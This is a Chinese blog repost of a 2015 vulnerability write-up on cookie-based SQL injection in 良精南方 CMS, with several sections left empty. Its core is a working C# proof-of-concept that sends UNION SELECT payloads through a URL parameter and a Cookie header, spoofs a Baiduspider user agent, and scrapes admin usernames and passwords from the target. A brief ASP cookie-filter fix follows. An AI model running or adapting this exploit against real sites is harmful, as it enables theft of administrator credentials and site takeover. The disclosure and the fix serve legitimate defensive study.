良精南方cms /inc/Check_Sql.asp SQL Injection Based On Cookie
2015-09-09 11:50
603 查看
catalog
1. 漏洞描述
[b][b][b][b][b]Relevant Link:[/b][/b][/b][/b][/b]
2. 漏洞触发条件
0x1: POC
3. 漏洞影响范围
4. 漏洞代码分析
Cookie注入
5. 防御方法
/inc/Check_Sql.asp
官方最新的代码中包含有对POST、GET的过滤代码,需要在这个基础上加上Cookie注入防御
6. 攻防思考
[b][b][b][b][b][b][b][b][b][b][b][b][b]Copyright (c) 2015 LittleHann All rights reserved[/b][/b][/b][/b][/b][/b][/b][/b][/b][/b][/b][/b][/b]
1. 漏洞描述 2. 漏洞触发条件 3. 漏洞影响范围 4. 漏洞代码分析 5. 防御方法 6. 攻防思考
1. 漏洞描述
[b][b][b][b][b]Relevant Link:[/b][/b][/b][/b][/b]
2. 漏洞触发条件
0x1: POC
using System;
using System.Collections;
using System.Net;
using System.Text;
using System.Text.RegularExpressions;
namespace windowsmanger
{
internal class ljnanfang
{
public string exp(string url)
{
string result;
try
{
string exps = "/NewsType.asp?SmallClass='%20union%20select%200,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9%20%66%72%6F%6D%20%61%64%6D%69%6E";
string urls = url;
if (!urls.Contains("http://"))
{
urls = "http://" + urls;
}
string shuju = new WebClient
{
Headers =
{
{
"user-agent",
"Baiduspider"
}
},
Encoding = Encoding.Default
}.DownloadString(urls + exps).Replace("\r", "").Replace("\n", "");
int a = shuju.IndexOf("title=");
int b = shuju.IndexOf("target=");
string jieguo = shuju.Substring(a + 8, b - a - 11);
result = jieguo;
}
catch
{
string jieguosd = this.isshuju(url);
if (jieguosd != "网站未发现安全隐患")
{
result = jieguosd;
}
else
{
result = "网站未发现安全隐患";
}
}
return result;
}
public string isshuju(string url)
{
string result;
try
{
string exps = "/shownews.asp";
string shuju = new WebClient
{
Proxy = null,
Encoding = Encoding.Default,
Headers =
{
{
"user-agent",
"Baiduspider"
},
{
"Cookie",
"ASPSESSIONIDCACQBSAT=JGGFLMFDNIDGIFLOJHNBMGBK;id=59+union+select+1,username,password,4,5,6,7,8,9,10+from+admin"
}
}
}.DownloadString(url + exps);
MatchCollection matcha = new Regex("<td.height=.50..*?align=.center..class=..*?.>(?<admin>.*?)</td>\\r(?s).*?</font>次.*?>\\r.*?\\r.*?\\r.*?\\r(?<pass>.*?)</td>", RegexOptions.None).Matches(shuju);
IEnumerator enumerator = matcha.GetEnumerator();
try
{
if (enumerator.MoveNext())
{
Match match = (Match)enumerator.Current;
string bb = match.Groups["admin"].ToString().Replace(" ", "");
string cc = match.Groups["pass"].ToString().Replace(" ", "");
result = bb + " " + cc;
return result;
}
}
finally
{
IDisposable disposable = enumerator as IDisposable;
if (disposable != null)
{
disposable.Dispose();
}
}
result = "网站未发现安全隐患";
}
catch
{
result = "网站未发现安全隐患";
}
return result;
}
}
}3. 漏洞影响范围
4. 漏洞代码分析
Cookie注入
5. 防御方法
/inc/Check_Sql.asp
On Error Resume Next '''' Chk_badword=split(Query_Badword,"∥") For Each Fy_Get In Request.Cookies For i=0 To Ubound(Chk_badword) If Instr(LCase(Request.Cookies(Fy_Get)),Chk_badword(i))<>0 Then Response.End End If Next Next ''''
官方最新的代码中包含有对POST、GET的过滤代码,需要在这个基础上加上Cookie注入防御
6. 攻防思考
[b][b][b][b][b][b][b][b][b][b][b][b][b]Copyright (c) 2015 LittleHann All rights reserved[/b][/b][/b][/b][/b][/b][/b][/b][/b][/b][/b][/b][/b]
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 
相关文章推荐
- ASP.NET成员资格与角色管理配置内容
- ASP.Net TextBox只读时不能通过后台赋值取值
- Aspose.words Mail Merge初识
- RaspberryPi下apt-get离线安装软件
- 【MVC5】ASP.NET MVC 项目笔记汇总
- IIS对Asp.Net WebForm和Asp.Net Mvc的处理通用部分
- 【深入ASP.NET原理系列】--ASP.NET请求管道对Asp.Net WebForm和Asp.Net Mvc的处理通用部分
- Asp.net 两个链接实现虾米音乐搜索
- asp.net用户自定义控件传参
- Asp.net MVC 与 Asp.net Web API 区别
- asp.net为关键词加上超链接,C#.net 为关键词加上超链接
- ASP.NET - 多级分类
- ASP.NET Authentication - Form Authentication
- (转)ASP.NET Identity入门系列教程(一) 初识Identity
- ASP.NET MVC 扩展HtmlHelper类方法
- Asp.Net Mvc4分页,扩展HtmlHelper类
- Aspose.words编程指南之DocumentBuilder二
- 树莓派2B使用360随身WiFi2代连接WiFi
- 树莓派2B安装配置
- 同一Session中的aspx页面的并发限制